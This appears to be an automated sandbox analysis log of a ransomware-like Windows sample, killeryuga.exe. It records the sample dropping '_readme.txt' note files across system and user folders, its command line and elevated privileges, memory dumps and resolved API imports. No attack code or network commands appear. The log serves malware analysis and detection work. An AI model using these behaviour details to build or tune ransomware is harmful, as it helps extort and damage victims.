File Create filename = C:\Boot\zh-HK\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\zh-HK\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\zh-TW\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\zh-TW\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Config.Msi\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Config.Msi\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Documents and Settings\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Documents and Settings\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Adobe\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Adobe\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Documents\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Documents\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Favorites\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Favorites\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Microsoft Help\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Microsoft Help\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Mozilla\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Mozilla\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Oracle\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Oracle\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Start Menu\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Start Menu\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Sun\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Sun\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Templates\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Templates\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Recovery\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Recovery\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\System Volume Information\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Users\Default\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\Default\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\BCD.LOG, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Process #6: killeryuga.exe
442 0
»
Information Value
ID #6
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
»
Information Value
PID 0x9d0
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9D4
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
Threads
Thread 0x9d4
222 0
»
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76c335b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74d4cc89 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x75af1ace True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x75b14124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x75b1232e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x75b1555d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x75af138a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x75ae7590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x75b1439f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x7560503c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
